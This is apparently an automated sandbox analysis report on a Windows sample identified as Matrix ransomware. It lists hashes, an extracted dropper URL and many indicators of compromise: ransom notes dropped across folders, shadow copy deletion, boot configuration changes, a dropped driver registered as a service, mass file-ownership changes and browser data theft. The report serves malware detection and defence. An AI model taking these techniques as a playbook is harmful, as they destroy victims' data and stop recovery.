matrix | 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

Analysis

max time kernel
100s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2022 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
Size

1.2MB
MD5

c50c17057fc6ea67bc579196f1f73712
SHA1

44495db58fa7c94db840a3f696c8f546a5fce2d1
SHA256

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
SHA512

7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
SSDEEP

24576:pxsxl/OOeI7RC4CJR5ez+IlnRJE5rABxPJhPPT/q:8fjRERAhPPzq

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrilf55p.Admin\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\reader\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Comms\UnistoreDB\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Links\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Google\Update\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\ext\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrilf55p.default-release\storage\default\moz-extension+++bc95a869-e063-4e4a-9ab8-754bf1a4c59b^userContextId=4294967295\idb\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Desktop\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\fonts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\regid.1991-06.com.microsoft\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\Documents\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\Libraries\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Pictures\Saved Pictures\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Mozilla Firefox\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\AccountPictures\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\Pictures\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\_platform_specific\win_x64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrilf55p.default-release\datareporting\archived\2022-11\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrilf55p.default-release\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4992 bcdedit.exe
2844 bcdedit.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

13 2496 powershell.exe
14 3644 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

h46yIQkH64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS h46yIQkH64.exe

pid	process
4992	bcdedit.exe
2844	bcdedit.exe

flow	pid	process
13	2496	powershell.exe
14	3644	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	h46yIQkH64.exe

Executes dropped EXE 64 IoCs

Processes:

NWSBH3uK.exeh46yIQkH.exeh46yIQkH64.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exeh46yIQkH.exe

pid	process
5000	NWSBH3uK.exe
4040	h46yIQkH.exe
4892	h46yIQkH64.exe
3032	h46yIQkH.exe
1692	h46yIQkH.exe
764	h46yIQkH.exe
4220	h46yIQkH.exe
2096	h46yIQkH.exe
2104	h46yIQkH.exe
808	h46yIQkH.exe
1992	h46yIQkH.exe
5024	h46yIQkH.exe
4440	h46yIQkH.exe
4704	h46yIQkH.exe
3324	h46yIQkH.exe
2884	h46yIQkH.exe
2008	h46yIQkH.exe
3124	h46yIQkH.exe
4228	h46yIQkH.exe
1260	h46yIQkH.exe
1444	h46yIQkH.exe
2780	h46yIQkH.exe
1556	h46yIQkH.exe
4440	h46yIQkH.exe
3768	h46yIQkH.exe
3476	h46yIQkH.exe
4208	h46yIQkH.exe
4352	h46yIQkH.exe
2768	h46yIQkH.exe
2160	h46yIQkH.exe
3448	h46yIQkH.exe
3812	h46yIQkH.exe
2080	h46yIQkH.exe
3120	h46yIQkH.exe
4424	h46yIQkH.exe
808	h46yIQkH.exe
5064	h46yIQkH.exe
5024	h46yIQkH.exe
1224	h46yIQkH.exe
3700	h46yIQkH.exe
2840	h46yIQkH.exe
1712	h46yIQkH.exe
3536	h46yIQkH.exe
2256	h46yIQkH.exe
4536	h46yIQkH.exe
3988	h46yIQkH.exe
4220	h46yIQkH.exe
1396	h46yIQkH.exe
280	h46yIQkH.exe
2852	h46yIQkH.exe
2292	h46yIQkH.exe
4992	h46yIQkH.exe
3664	h46yIQkH.exe
2740	h46yIQkH.exe
4032	h46yIQkH.exe
4360	h46yIQkH.exe
4788	h46yIQkH.exe
3672	h46yIQkH.exe
4068	h46yIQkH.exe
4352	h46yIQkH.exe
2160	h46yIQkH.exe
1792	h46yIQkH.exe
2524	h46yIQkH.exe
296	h46yIQkH.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\UseDebug.tiff	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

h46yIQkH64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	h46yIQkH64.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4040-170-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/3032-182-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/1692-185-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/764-192-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4220-195-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2096-202-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2104-205-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/808-214-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/1992-217-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/5024-224-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4440-227-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4704-234-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/3324-237-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2884-244-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2008-246-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/3124-248-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4228-250-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/1260-252-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/1444-254-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2780-256-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/1556-258-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/4040-259-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4440-261-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/3768-263-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/3476-265-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4208-267-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/4352-269-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2768-271-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2160-273-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/3448-275-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/3812-277-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe	upx
behavioral2/memory/2080-279-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	wscript.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
4284	takeown.exe
5040	takeown.exe
1280	takeown.exe
1224	takeown.exe
3652	takeown.exe
768	takeown.exe
4444	takeown.exe
1500	takeown.exe
1484	takeown.exe
100	takeown.exe
3476	takeown.exe
1044	takeown.exe
2980	takeown.exe
4796	takeown.exe
220	takeown.exe
2616	takeown.exe
1544	takeown.exe
3680	takeown.exe
3124	takeown.exe
4308	takeown.exe
2392	takeown.exe
60	takeown.exe
1636	takeown.exe
2728	takeown.exe
4884	takeown.exe
1352	takeown.exe
1548	takeown.exe
4608	takeown.exe
1488	takeown.exe
2264	takeown.exe
2268	takeown.exe
1544	takeown.exe
1692	takeown.exe
2840	takeown.exe
2268	takeown.exe
4088	takeown.exe
284	takeown.exe
1304	takeown.exe
2580	takeown.exe
4196	takeown.exe
2224	takeown.exe
1484	takeown.exe
2020	takeown.exe
2392	takeown.exe
2308	takeown.exe
2360	takeown.exe
3932	takeown.exe
1692	takeown.exe
4456	takeown.exe
2432	takeown.exe
2340	takeown.exe
3384	takeown.exe
3112	takeown.exe
224	takeown.exe
4224	takeown.exe
5044	takeown.exe
4388	takeown.exe
2188	takeown.exe
4812	takeown.exe
3508	takeown.exe
4748	takeown.exe
4428	takeown.exe
264	takeown.exe
4560	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 27 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

